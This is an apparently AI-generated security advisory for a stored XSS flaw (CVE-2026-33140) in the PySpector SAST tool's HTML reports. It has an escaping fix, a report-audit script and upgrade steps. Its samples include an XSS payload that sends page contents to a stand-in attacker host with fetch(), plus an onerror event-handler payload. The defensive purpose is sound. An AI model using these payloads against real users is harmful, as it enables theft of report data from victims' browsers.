CVE-2026-33140 Overview
CVE-2026-33140 is a stored Cross-Site Scripting (XSS) vulnerability affecting PySpector, a static analysis security testing (SAST) framework designed for modern Python development workflows. The vulnerability exists in the HTML report generator component, where flagged code snippets containing JavaScript payloads are interpolated into HTML reports without proper sanitization. When a user opens a generated report in a browser, embedded malicious JavaScript executes within the browser's local file context.
Critical Impact
Attackers can craft malicious Python files that, when scanned by PySpector, inject JavaScript into the generated HTML reports. Opening such a report executes the script in the victim's browser. Because the report is opened from disk rather than served by a web application, there is no web session to hijack in the usual sense; the realistic consequences are theft of whatever the script can read from the page or the file:// origin, outbound requests that exfiltrate that data, and further attacks launched from the victim's browser.
Affected Products
- PySpector versions 0.1.6 and prior
- parzivalhack pyspector (Python package)
Discovery Timeline
- 2026-03-20 - CVE-2026-33140 published to NVD
- 2026-03-24 - Last updated in NVD database
Technical Details for CVE-2026-33140
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) occurs in PySpector's HTML report generation process. When PySpector performs static analysis on Python source files, it identifies potentially dangerous code patterns such as calls to eval() and includes the flagged code snippets in the generated HTML report. The vulnerability stems from the report generator's failure to sanitize these code snippets before embedding them in the HTML output.
An attacker can exploit this by crafting a Python file containing JavaScript payloads within strings that PySpector will flag during analysis. For example, a string passed to eval() containing a <script> tag will be flagged as a security issue, but when included in the HTML report, the script tags are interpreted by the browser as executable JavaScript rather than display text.
The attack requires user interaction: a victim must open the generated HTML report in a web browser. The JavaScript then executes in the browser's local file context (file:// scheme). How much that grants depends on the browser: current Chrome and Firefox treat each file:// document as its own opaque origin, so reading other local files is largely blocked, but the script can still read the full report, make outbound requests to exfiltrate it, and may get broader local access in older or permissively configured browsers.
Root Cause
The root cause is improper output encoding in PySpector's HTML report generator. When code snippets are extracted from scanned Python files and inserted into the HTML template, special HTML characters like <, >, &, and quotes are not properly escaped or encoded. This allows malicious content within the scanned files to break out of the intended text context and be interpreted as HTML/JavaScript by the browser.
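The mechanism described above, reduced to a runnable illustration. This is an added example and not PySpector's code: the eval() finder, the two report renderers and the sample source file are all constructed here to show the missing encoding step and the html.escape() fix the advisory describes.

```python
import ast
import html

# Constructed sample input (not taken from the advisory): a Python file whose
# eval() argument carries an HTML/JS payload. A SAST tool flags the eval()
# call and copies this exact snippet into its report.
MALICIOUS_SOURCE = '''
def run(expr):
    return eval("<script>fetch('https://attacker.invalid/?r=' + document.body.innerHTML)</script>")
'''


def flag_eval_calls(source):
    """Mirror the SAST step: return the source text of every eval() call.

    Hypothetical stand-in for PySpector's real rule engine; only the
    snippet-extraction behaviour matters for the bug.
    """
    tree = ast.parse(source)
    snippets = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id == "eval"):
            snippets.append(ast.get_source_segment(source, node))
    return snippets


def render_report_vulnerable(snippets):
    """The CVE-2026-33140 pattern: snippets are interpolated verbatim, so any
    markup inside them is parsed as HTML by the viewing browser."""
    rows = "".join(f"<li><code>{s}</code></li>" for s in snippets)
    return f"<html><body><h1>Findings</h1><ul>{rows}</ul></body></html>"


def render_report_fixed(snippets):
    """Hardened form: encode <, >, &, \" and ' before interpolation so the
    snippet is displayed as text. quote=True also makes the value safe if a
    template ever places it inside an attribute."""
    rows = "".join(
        f"<li><code>{html.escape(s, quote=True)}</code></li>" for s in snippets
    )
    return f"<html><body><h1>Findings</h1><ul>{rows}</ul></body></html>"


def contains_live_script(report_html):
    """Demo check: a raw <script start tag means the browser will execute it."""
    return "<script" in report_html.lower()


if __name__ == "__main__":
    found = flag_eval_calls(MALICIOUS_SOURCE)
    print("vulnerable report executes payload:",
          contains_live_script(render_report_vulnerable(found)))
    print("fixed report executes payload:     ",
          contains_live_script(render_report_fixed(found)))
```

The fix is a single encoding call at the point where untrusted text meets the template; the same rule applies to every other field copied from the scanned file (file names, string constants, comments), not just the flagged snippet.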
Attack Vector
The attack vector is network-based: the attacker needs no access to the victim's machine, only a way to get a malicious Python file in front of PySpector. This could occur in several scenarios:
- Supply Chain Attack: An attacker contributes a malicious Python file to a shared repository that undergoes automated SAST scanning
- Direct File Submission: In environments where PySpector is used as a service, attackers submit crafted Python files
- Social Engineering: An attacker convinces a developer to scan a malicious file
The vulnerability allows execution of arbitrary JavaScript when the generated HTML report is viewed in a browser. While the attack requires passive user interaction (opening the report), the payloads persist in the generated reports, enabling time-delayed attacks.
The vulnerability mechanism involves malicious JavaScript payloads embedded within Python code strings that PySpector flags during analysis. When the report generator includes these flagged snippets without sanitization, the JavaScript becomes executable HTML content. For detailed technical information, refer to the GitHub Security Advisory.
Detection Methods for CVE-2026-33140
Indicators of Compromise
- HTML reports generated by PySpector versions 0.1.6 and earlier containing unescaped <script> tags or event handlers within code snippets
- Python files submitted for scanning containing suspicious JavaScript payloads within string literals
- Browser console errors or unusual network requests when opening PySpector HTML reports
- Evidence of local file access attempts from the file:// protocol context
Detection Strategies
- Implement file integrity monitoring on PySpector-generated HTML reports to detect unexpected JavaScript content
- Deploy browser-based XSS detection extensions to alert on suspicious script execution from local files
- Review submitted Python files for patterns indicative of XSS payloads before scanning
- Monitor for unusual browser behavior when accessing SAST tool outputs
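A triage script for the first indicator above (unescaped <script> tags or event handlers inside report snippets) and for reviewing already-generated reports before anyone opens them. This is an added example, not part of the advisory or of PySpector; the two sample reports are constructed, and since the element layout of real PySpector reports is not known here the audit checks the whole document. If a report template legitimately ships its own <script> for page behaviour, that one element will need to be allowlisted.

```python
import re
import sys
from html.parser import HTMLParser

# Constructed sample reports (not real PySpector output): one where the flagged
# snippet was interpolated raw, one where it was HTML-encoded.
UNSAFE_REPORT = """<html><body><h1>Findings</h1><ul>
<li><code>eval("<script>fetch('https://attacker.invalid/?r=' + document.body.innerHTML)</script>")</code></li>
<li><code>os.system("<img src=x onerror='alert(1)'>")</code></li>
<li><a href="javascript:alert(1)">details</a></li>
</ul></body></html>"""

SAFE_REPORT = """<html><body><h1>Findings</h1><ul>
<li><code>eval(&quot;&lt;script&gt;fetch(&#x27;https://attacker.invalid/&#x27;)&lt;/script&gt;&quot;)</code></li>
</ul></body></html>"""

JS_URL = re.compile(r"^\s*javascript:", re.IGNORECASE)


class ScriptAudit(HTMLParser):
    """Record every construct that would run JavaScript when the report is
    opened: <script> elements, on* event-handler attributes and javascript:
    URLs. Properly encoded snippets (&lt;script&gt;) arrive as text and are
    never reported, so a clean result is expected for patched reports."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line, _ = self.getpos()
        if tag == "script":
            self.findings.append(("script-tag", line, "<script>"))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", line, f"{name}={value!r}"))
            elif value is not None and JS_URL.match(value):
                self.findings.append(("javascript-url", line, f"{name}={value!r}"))


def audit_report(report_html):
    """Return a list of (kind, line, detail) tuples; an empty list means the
    parser found nothing that executes."""
    parser = ScriptAudit()
    parser.feed(report_html)
    parser.close()
    return parser.findings


def audit_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_report(fh.read())


if __name__ == "__main__":
    # Usage: python audit_reports.py report1.html report2.html ...
    for path in sys.argv[1:]:
        for kind, line, detail in audit_file(path):
            print(f"{path}:{line}: {kind} {detail}")
```

Run it over the report directory before opening anything in a browser; a non-empty result for a report produced by 0.1.6 or earlier is the indicator the advisory describes, and the line numbers point at the offending snippet.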
Monitoring Recommendations
- Audit PySpector version deployments across development environments and CI/CD pipelines
- Where possible, apply a content security policy to report viewing, for example by serving reports from a local web server that sets a CSP header instead of opening them directly from disk
- Log and monitor access patterns to generated HTML reports for anomalous activity
- Establish baseline behavior for PySpector report generation and alert on deviations
How to Mitigate CVE-2026-33140
Immediate Actions Required
- Upgrade PySpector to version 0.1.7 or later immediately across all development environments
- Review previously generated HTML reports for potential malicious content before opening
- Temporarily disable HTML report generation if upgrade cannot be performed immediately
- Consider using alternative output formats (JSON, plain text) until patched version is deployed
Patch Information
The vulnerability has been addressed in PySpector version 0.1.7. The patch implements proper HTML encoding for code snippets included in generated reports, ensuring that special characters are escaped and cannot be interpreted as executable HTML or JavaScript. Users should update their PySpector installation using their package manager.
For complete patch details and additional security information, consult the GitHub Security Advisory GHSA-2gmv-2r3v-jxj2.
Workarounds
- Avoid opening HTML reports generated by vulnerable PySpector versions in web browsers
- Use text-only viewing methods or convert reports to plain text before review
- Sanitize generated reports before viewing them in a browser, for example by running them through an HTML sanitizer such as DOMPurify (which needs a DOM, so in a browser or under jsdom in Node) and reviewing the sanitized copy
- Configure browser security settings to restrict JavaScript execution for local files
# Upgrade PySpector to the patched version (quote the specifier: an unquoted
# >= is parsed by the shell as an output redirection, not passed to pip)
pip install --upgrade "pyspector>=0.1.7"
# Verify the installed version
pip show pyspector | grep Version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.